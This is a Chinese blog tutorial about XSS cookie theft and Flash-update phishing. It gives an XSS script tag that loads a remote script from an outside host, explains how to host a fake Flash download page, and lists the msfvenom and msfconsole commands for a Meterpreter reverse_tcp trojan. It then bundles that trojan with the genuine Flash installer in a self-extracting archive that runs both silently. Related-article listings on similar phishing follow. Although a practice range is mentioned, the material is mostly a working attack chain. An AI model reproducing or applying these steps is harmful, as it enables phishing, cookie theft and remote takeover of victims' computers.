flash钓鱼网站

已于 2024-07-23 18:38:21 修改
阅读量681 收藏 5
点赞数 13
文章标签: 前端 javascript html
于 2024-07-23 18:33:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63944205/article/details/140637520
版权

XSS-窃取Cookie

1.注册并登录https://xssaq.com/网站

2.后新建项目

3.复制图中代码<sCRiPt sRC=//d00.cc/JkV></sCrIpT>

打开pikachu靶场xss盲打操作如图

4.登陆后台系统

5.返回xss网站出现我们的项目

攻击钓鱼

1.访问网站:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash

下载乌鸦安全zip

2.解压文件将下方文件放到www文件夹下

根目录下访问

来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹ 站的根⽬录下⾯

修改js中的这⼀⾏代码,改成我们伪造的flash⽹站地址

进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊ ⻢..

# Flash官⽹下载
https://www.flash.cn/download-wins


#打开kali
# MSF⽣成Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=44
44 -f exe > shell.exe
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

将两个⽂件⼀块压缩并更改⽂件名为"flash.exe",点击"⾼级"标签⻚下的"⾃解压选项"填 写解压路径为 C:\Windows\Temp

C:\Windows\Temp\shell.exe C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe

配置更新⽅式---->解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

下载后执行安装文件

flash.exe文件会自动运行,至此连接成功

丢了没
关注
web登录页面代码_XSS实战之登录钓鱼网站后台
weixin_39974882的博客
12-10 2665
前言感觉最近被盗号的很多,好朋友账号被盗,我竟然傻乎乎的转了200大洋。本篇就以钓鱼为主题,只是让大家提升一下对盗号的认识和理解,让大家对于钓鱼盗号有所防范。XSS漏洞之前写过一篇文章讲解XSS漏洞分类以及危害,XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的恶意代码会被执行,从而达到特殊目的。最常见的就是...
Flash水坑钓鱼
god_Zeo的安全博客
02-06 6204
Flash水坑钓鱼起因准备先配置一个马子吧自解压捆绑文件的利用上传到服务器常见用法 起因 在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。 未雨绸缪,先测试一下,以后肯定用的到 准备 flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn 一个服务器 一个域名 一个马子 先配置一个马子吧 使用常用的CS吧,随便来一个,成功上线 关于...
XSS-Flash攻击钓鱼
ineedmoreMuQ的博客
07-23 1446
XSS-Flash攻击钓鱼
社会工程学实验-一次非正式钓鱼的测试(靶场演示)
易编橙 · 终身成长社群,相遇已是上上签!
12-19 1534
文章目录社会工程学实验-一次非正式钓鱼的测试SET中渗透测试的攻击向量SET中的第三方模块社会工程学攻击 社会工程学实验-一次非正式钓鱼的测试 关于SET:Social-engineering toolkit的缩写,社会工程学工具集。里面包含了许多用于进行社会工程学攻击的工具。 社会工程学 社会工程学通常以交谈、欺骗、假冒或口语等方式,从合法用户中套取用户系统的秘密。熟练的社会工程师都是擅长进行信息收集的身体力行者。很多表面上看起来一点用都没有的信息都会被这些人利用起来进行渗透。比如说一个电话号码,一个人的
内网flash钓鱼
weixin_44110913的博客
10-09 828
内网flash钓鱼 操作流程:注意:该方法只支持http的网页 开启apache服务并挂上钓鱼页面,在var/www/html下即可,或者自己创建,可百度如何操作 vim /etc/ettercap/etter.dns .开启ettercap -G 修改:vim /etc/ettercap/etter.dns 添加想钓鱼的域名,修改图中红线位置,比如钓鱼www.baidu.com 到我们的ip,受害者访问百度时候就会解析到我们的钓鱼网页 该位置我们设置为所有com结尾的网站 查看受害者的
pikachu靶场___URL重定向漏洞教程
qq_41584172的博客
12-06 1352
1、靶场环境搭建使用 详见 https://blog.csdn.net/qq_41584172/article/details/1030201090x00 2、URL重定向漏洞背景介绍 由于应用越来越多的需要和其他的第三方应用交互,以及在自身应用内部根据不同的逻辑将用户引向到不同的页面,譬如一个典型的登录接口就经常需要在认证成功之后将用户引导到登录之前的页面,整个过程中如果实现不好就可能导致一些...
Flash钓鱼讲解
总有人间一两风,填我十万八千梦
05-31 1062
flash钓鱼
xss漏洞->flash钓鱼网站->拿到主机控制权
qq_68186313的博客
07-23 487
xss漏洞->flash钓鱼网站->拿到主机控制权
xss利用flash弹窗钓鱼
cjchsh的博客
03-07 452
xss利用flash弹窗钓鱼
xxs-flash-钓鱼
qq_38618396的博客
12-27 832
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
小猫钓鱼Flash课件.swf
12-18
小猫钓鱼Flash课件.swf
攻防演练 | Flash钓鱼手法分享
2301_80115097的博客
06-11 954
前几天看了一篇土司的实战文章,操作骚的一批,而且师傅把钓鱼源码传到了github上我拿过来研究一下免杀钓鱼的手法百试不爽,很多情况下比0day要好用很多,尤其是针对目标网站实在是没有什么可利用的漏洞的时候。我们本次设想的环境是能够找到xss,这个漏洞不难找的,很多大厂也无法避免这种漏洞,骚就骚在怎么利用这个漏洞将我们的木马加以隐藏,因为正常情况下一个跟你不是很熟的人很难点我们直接发过去的马,即便是做过伪装的。
Flash-Pop:优化版Flash钓鱼弹窗技术
资源摘要信息:"Flash-Pop是一种优化版的Flash钓鱼弹窗技术。Flash曾是一种流行的动画技术,广泛用于网页设计和交互式内容的开发。然而,随着HTML5、CSS3和JavaScript技术的发展和普及,Flash技术逐渐被淘汰。尽管...
[Harmony]WebView基本用法
Gamin
05-22 165
在module.json5中申请网络权限,通过requestPermissions字段指定ohos.permission.INTERNET权限,并设置使用场景为始终可用。在跳转至WebView时,通过router.pushUrl传递网页地址和标题参数。WebView组件通过aboutToAppear生命周期接收路由参数,并加载指定网页。页面包含导航栏,支持返回操作,并显示网页加载状态。整体流程实现了网络权限申请、参数传递及WebView页面展示。
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
fantasy_4的博客
05-21 709
基于Browser Use + Playwright 实现AI Agent操作Web UI自动化
【sylar-webserver】10 HTTP模块
weixin_52355727的博客
05-22 740
HTTP 模块
自制AirTag定位器成品使用FAQ
小桥流水丿小溪
05-22 711
在安装过程中,会创建一个 Docker 卷 ( mh_data ),它位于默认文件夹中。查看Source键。该文件夹通常受到保护,只有 root 用户才能访问和修改。在该文件夹中,您将找到配置 (config.ini) 和身份验证 (auth.json)(如果已执行)。此外,用于 SSL 的自签名证书也位于此处。
使用Tkinter写一个发送kafka消息的工具
Naylor的博客
05-21 482
公司专注于AR实景产品,随着无人机的普及,提出了将无人机接入AR实景项目的需求。为此,开发了一款工具,用于模拟无人机飞行时的飞控数据。该工具基于Python 3.9.7,使用TKinter作为GUI框架,并集成confluent_kafka库进行Kafka消息处理。工具界面允许用户填写Kafka连接地址,编写并发送消息到指定topic,同时所有操作日志实时显示在用户界面。代码结构包括创建GUI程序、搭建前端样式和编写功能实现代码,其中通过回调函数处理消息发送等操作,确保用户操作的流畅性和实时反馈。
[Vue]路径跳转和路由高级设置
最新发布
m0_74217128的博客
05-22 799
编程式导航实际意思是,通过用户的一些操作来实现页面的跳转,例如登录成功后跳转个人首页等等。指的是我们网页中嵌套了其他的网页资源,换到编程的视角就是父子组件。比如某个产品的网站,上边一个导航栏,中间是各种不同内容的分页。2.通过router对象的push方法,上传我们的路径信息(当然,一般会写在方法里面,通过事件触发)。2.在主页面中使用标签<router-view></router-view>,用于布置嵌套的页面资源。在这里,每次跳转传递的都是固定的路径信息,浏览器拿到的就是to属性对应的字符串。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值